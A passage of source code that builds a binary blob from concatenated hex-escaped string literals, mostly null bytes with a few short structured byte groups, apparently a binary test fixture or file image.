"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x31\x2B\x9A\xA3\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xF1\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x7D\xB3\xF8\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\xF5\xF6\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x56\x29\x5B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xBA\x04\x54\x09\xFD\x07\x13\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x26\x65\x13\xC2\x35\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x20\xA7\xD6\xDA\x87\x21\x71\x5C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD7\x90\xE5\xC1\x32\x12". + "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4B\x3F\xED\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xFB\xF5". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xDD\x41\x2A\xA9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xF3\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x7E\xC7\xCE". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x75". + "\xC0\xD8\x15\x23\xCD\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x65\x89\xC2\x86\xE6\x00\x43\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x12\xA1\x4E\x0F\xAC\x5B\xF0\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF4\x90\x7A\xC1\x8E\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x09\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
